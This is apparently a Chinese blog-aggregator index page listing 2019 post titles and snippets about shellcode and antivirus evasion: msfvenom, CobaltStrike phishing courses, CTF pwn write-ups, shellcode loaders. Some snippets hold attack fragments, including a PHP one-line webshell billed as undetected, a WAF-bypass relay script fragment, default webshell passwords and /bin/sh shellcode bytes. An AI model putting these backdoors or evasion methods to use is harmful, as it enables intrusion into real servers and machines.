免杀Shellcode

Metasploit Framework学到上火,嘴角起疮,眼睛干涩,牙龈肿痛之生成木马

msfvenom生成木马查看可以支持windows64位的payloadmsfvenom-lpayload|grepx64msfvenom-p指定payload-f输出的格式-e是编码器-c添加一个win32的shellcode
社会底层中的弱智·2019-08-19 14:13

CTF-PWN-callme32 [ROP+栈溢出]

首先发现在pwnme函数中有一个明显的缓冲区溢出,长度为40,经调试发现填入44长度的垃圾信息即可填入shellcodeida发现一个重要函数如下:点入后发现这三个函数为系统级调用。
SuperGate·2019-08-13 15:50

Django的Bug处理

Django的Bug处理BUGWhenIrunthisshellcode,itwillshowedthiserrortips:mysqlclient1.3.13ornewerisrequired;youhave0.9.3
ZoeyZhao·2019-08-13 11:31

IDA Pro

是目前最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode安全分析人士不可缺少的利器!IDAPro是一款交互式的,可编程的,可扩展的,多处理器
顺其自然~·2019-08-10 21:11

edgy 300

ghostintheshellcodeedgy编程题题意:一张图,一个起点,一堆障碍,从起点出发,给出一条线路,给定限制的重复次数,他会按照重复的方式走,请问怎么走?
god_speed丶·2019-08-10 11:35

CobaltStrike视频教程

:介绍与安装介绍与安装第二章:payload应用创建监听及生成payloadoffice宏payload应用httpspayload应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章:免杀应用使用
wx5d4987290eb2c·2019-08-06 22:42

编写Windows Kernel Shellcode

网上流传的永恒之蓝漏洞利用代码中,关于内核shellcode部分,大部分都是利用APC注入的。
看雪学院·2019-08-01 18:15

编写Windows Kernel Shellcode

网上流传的永恒之蓝漏洞利用代码中,关于内核shellcode部分,大部分都是利用APC注入的。
看雪学院·2019-08-01 18:15

CobaltStrike 应用教程

:介绍与安装介绍与安装第二章:payload应用创建监听及生成payloadoffice宏payload应用httpspayload应用搜集目标基本信息网页挂马应用钓鱼页面应用批量发送钓鱼邮件第三章:免杀应用使用
发哥微课堂·2019-07-29 22:09

[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)

0x001原理采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。本文主要将ShellCode转成HEX,再通过加载器执行ShellCode
K8哥哥·2019-07-21 23:00

Linux中的保护机制

一:canary(栈保护)栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。
f1yingf0x·2019-07-21 23:00

1_无安全机制_32

include#includevoidvul(char*msg){charbuffer[64];strcpy(buffer,msg);return;}intmain(){puts("Soplzgivemeyourshellcode
Zero_0_0·2019-07-13 20:27

修复一个shellcode

https://www.exploit-db.com/shellcodes/40245Windows/x86-MessageBoxA()Shellcode(242bytes)shellcode功能是使用
大仲的书屋·2019-07-11 19:38

各类黑客大马默认密码后门

通过goolehack语法搜索incontent:xx黑客留的后门黑羽基地免杀asp大马密码5201314HackedByCHINA!
痱子﹑·2019-07-09 15:00

ret2shellcode

/什么保护都没有把文件放入idaF5一下把输入的s复制到了buf2发现buf2在bss段,buf2地址为0x0804A080,检查一下buf2是否可写(通常都是可写的),因为没开保护,我们可以直接写入shellcode
杰_74·2019-07-02 19:42

2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核提权+Exploit-Exercises Nebula学习与实践

Windows本地内核提权漏洞概述漏洞原理漏洞复现windbg调试本地内核查看SSDT表和SSDTShadow表查看窗口站结构体信息利用Poc验证漏洞漏洞利用分配零页内存构造能够获取SYSTEM进程令牌的shellcode
匪夷所思05·2019-06-29 22:00

路由器漏洞利用入门

MIPS指令集的栈溢出与x86指令集的有所不同,所以漏洞的利用方式也不太相同,但是溢出的思路是一样的:覆盖返回地址、劫持程序控制流、构造ROPchain、写shellcode等等。
Nevv·2019-06-29 21:06

免杀fpipe端口转发

forwardpipe是一个端口重定向工具,就是可以实现从Internet到局域网内部机器的特定端口服务的访问,简单从字面意思来理解即转发通过管道,也就是所谓的端口重定向,通过一个管道,把一端端口流量丢给管道的另一端端口。基础准备:本机win10,IP:192.168.0.2可以与虚拟机win10通信,不能与虚拟机win12通信虚拟机win12IP:192.168.5.167假设是内网中不能出网的
丶ershiyi·2019-06-28 18:39

Donut:将.NET程序集注入Windows进程

Donut是一个shellcode生成工具,它可以从.NET程序集中创建与位置无关的shellcodepayloads。此shellcode可用于将程序集注入任意Windows进程。
Coisini、·2019-06-26 12:03

20165212 任胤 《网络对抗》免考项目——恶意代码、恶意程序绑定

恶意代码、恶意程序绑定实践1Shellcode的生成与分析1.1shellcode概念和获取手段Shellcode是16进制的机器码,我的所有实验中shellcode来源于两个地方:一是kali中用msfvenom-plinux
FenixRen·2019-06-24 22:00

php中转菜刀脚本过狗免杀

$V){if(strstr($v,"base64_decode")){$v=str_replace("base64_decode(","",$v);$v=str_replace("))",")",$v);}else{if($k==="z0"){$v=base64_decode($v);}}$pp=$k."=".urlencode($v);if($i!=0){$post=$post."&".$pp;
痱子﹑·2019-06-16 19:00

一句话木马(最新免杀php后门一句话)

啊哈哈这段代码可以被利用做后门暂时免杀。代码:<?php//t.php$test=$_GET['r'];echo`$test`;?>大家看看这个代码有木有问题?
Coisini、·2019-06-15 17:24

渗透测试中POC、EXP、Payload与Shellcode的区别(转)

原文地址:https://howiezhao.github.io/2018/04/29/payload-shellcode-exp-poc/1.POC、EXP、Payload与ShellcodePOC,
橘子女侠·2019-06-09 17:41

文件类漏洞ShellCode的查找

目录0x_1.何为文件类漏洞0x_2.文件类漏洞的分类0x_3.查找文件类漏洞ShellCode的方法0x_4.例子0x_5.总结0x_1.何为文件类漏洞文件类漏洞只是一个
Coisini、·2019-06-09 16:59

从后渗透分析应急响应的那些事儿(二)免杀初识篇

从后渗透分析应急响应的那些事儿(二)免杀初识篇文章首发于freebufTidesec专栏https://www.freebuf.com/column/204005.html,转载到个人博客记录,转载请注明出处
上卿·2019-06-06 15:29

Virbox Compiler -安全编译器——实现源代码编译过程的加密

加密后程序不会报毒,可实现免杀。这是一款源代码加密产品,支持全平台全架构,可以用于保护传统软件、移动端软件、智能设备软件、IoT软件等的源代码。
辉这样说·2019-06-06 13:33

xctf攻防世界_level1——本地和远程程序不一样

coding:utf-8-*-importpwnfrompwnimport*#pwn.context.log_level='debug'#context(arch='i386',os='linux')#shellcode
lonyliu·2019-05-22 19:29

安全笔记:渗透|Metasploit的MSF终端——基础使用(未完全修改)

目录基础使用指南接口功能程序基础功能载荷配置攻击方式msfvenom附属功能数据库nexposenessus自建脚本常用模块介绍情报搜集——扫描模块渗透攻击后渗透攻击(Meterpreter)免杀技术相关知识基础使用指南情报搜集
-Mr.Chen-·2019-05-19 17:14

可打印shellcode

frompwnimport*shellcode='''push0x68;压入/bin/shpush0x732f2f2fpush0x6e69622fpushesppopebx;ebx指向字符串pushedxpopeax
Sadmess·2019-05-13 15:54

2019-05-12强化学习

1.普通恶意软件攻击--------------->普通恶意软件检测模型-————>使用强化学习技术对恶意软件进行升级以此来免杀—————>使用升级版的软件再次来训练恶意软件检测模型2.XSS脚本攻击-
持戒行善·2019-05-12 11:59

vc++中输入表的免杀

vc++中输入表的免杀国外的杀毒软件一般会把特征码定位在PE文件的输入表函数(也就是源码里我们调用了的API函数)上,我们对付这种查杀的方法就是在源码里对API函数进行动态调用,对一个函数动态调用之后,
清心_3389·2019-05-04 20:00

pwn学习日记Day4 基础知识积累

shr:带进位的右移shellcode的变形函数代码在栈中保存顺序(直观理解,已省略其他细节):buffer前栈帧EBP返回地址ESP溢出原理正常情况下函数在返回过程中,最后会执行返回地址中保存的内容,
anxiong1803·2019-04-29 21:00

pwn学习日记Day3 基础知识积累

BufferRegister:缓冲寄存器shellcode的变形"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6
anxiong1803·2019-04-29 00:00

20189224 《网络攻防实践》/《网络攻击与防范》第九周学习总结

缓冲区溢出和Shellcode
20189224史馨怡·2019-04-28 15:00

攻防世界-RE-ReverseMe-120(主要是对Base64再深入熟悉一下)

前言今天随机做了三题,但是感觉都是简单题,基本完成了pediy18-10,但是最后的shellcode执行上遇到了一点问题没有解决。
Wwoc·2019-04-24 21:37

缓冲区溢出-基本ROP-ret2syscall

本文视频:如果文字过于枯燥,可观看在线视频:https://edu.51cto.com/sd/16514基础知识:我们在前面讲的ret2text,ret2shellcode,今天来讲下ret2syscall
Margin_51cto·2019-04-16 19:48

缓冲区溢出-基本ROP-ret2shellcode

本文视频:如果文字过于枯燥,可观看在线视频:https://edu.51cto.com/sd/16514基础知识:ret2shellcode,即控制程序执行shellcode代码。
Margin_51cto·2019-04-16 19:55

渗透测试入门6之权限提升

渗透测试入门6之权限提升WindowsBypassUAC常用方法使用IFileOperationCOM接口使用Wusa.exe的extract选项远程注入SHELLCODE到傀儡进程DLL劫持,劫持系统的
jayjaydream·2019-04-03 18:08

level1

checksec一下,发现什么都没开image.pngIDA里看一下,存在栈溢出,还给我们打印了栈的地址image.png再加上没有开启NX,那就是很明显的ret2shellcode了exp:frompwnimport
n0va·2019-03-21 21:46

简单shellcode编写

0x00介绍Shellcode是指经过精心设计的一串指令,一旦注入正在运行的应用程序中即可运行,常用于栈和基于堆的溢出。
Bl0od·2019-03-14 16:00

免杀】————3、Excel 和 Metasploit 和 免杀

这篇文章主要介绍以Excel文件为载体,生成meterpreter反向shell的不同方法。简介这篇文章会继续讨论反向shell和规避杀毒软件的方法。有兴趣的可以看我的前一篇文章。随着时间飞逝,以前一些很好的绕过杀毒软件的方法现在均已失效。所以,我必须找到一种新的方法来隐藏我的反向shell。让我们开始吧………古老而简单的方法可能是最好的…通过SMB_Deliver开启一个meterpreter的
FLy_鹏程万里·2019-03-07 09:40

二进制安全之NX绕过方法--ROP技术

二进制安全之NX绕过方法–ROP技术原文地址在之前的缓冲区溢出的实验中,溢出到栈中的shellcode可以直接被系统执行,给系统安全带来了极大的风险,因此NX技术应运而生,该技术是一种在CPU上实现的安全技术
Hvnt3r·2019-03-06 14:05

免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路

总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。00x2.可变变量、引用、可变函数。
FLy_鹏程万里·2019-03-04 15:42

Install CMake on Ubuntu

#Wecanfindtar.gzfilesareincludedintheshellcodecmake-3.14.0-rc3-Linux-x86_64.sh#Helplistforcmake.shshcmake
曹志文·2019-03-03 12:38

安全相关的技术和工具

是目前最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode安全分析人士不可缺少的利器!
peerless_1024·2019-03-01 22:52

纪念一位母亲(古风)

答谢亲友结善缘,避免杀戮战争因。心无挂碍菩萨行,发行无上菩提心。图片发自App03、娑婆引业不再欠,遗嘱拒收亲友钱,香积世界请素宴,宇宙祥和国泰安。国家资源莫多占,愿海寺塔永修禅。意不颠倒不贪恋,一句
真如自在·2019-02-22 02:26

网络安全入门术语必知

Vulnerability泛指漏洞exp(Exploit)漏洞利用,一般是个demo程序,一些白帽子都可以自己利用python写exppayload:有效攻击载荷包含在你用于一次漏洞利用(exploit)中的ShellCode
L6y1a·2019-02-20 14:53

Windows漏洞利用开发 - 第4部分:使用跳转定位Shellcode 模块

尽管它存在缺陷,但就漏洞而言,它非常简单直接——直接利用指向我们shellcode的寄存器从而直接跳转到EIP覆盖。事情并不总是那么容易。通常你必须做更多的
看雪学院·2019-02-11 18:52

PWN菜鸡入门之栈溢出(1)

栈溢出一、基本概念:函数调用栈情况见链接基本准备:bss段可执行检测:​gef➤bmainBreakpoint1at0x8048536:fileret2shellcode.c,line8.gef➤rStartingprogram
pwn2web·2019-02-03 17:00

PWN 菜鸡入门之 shellcode编写 及exploid-db用法示例

下面我将参考其他资料来一步步示范shellcode的几种编写方式0x01系统调用通过系统调用execve函数返回shellC语言实现:#include#includechar*buf[]={"/bin/
pwn2web·2019-02-02 16:00
上一页 28 29 30 31 32 33 34 35 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他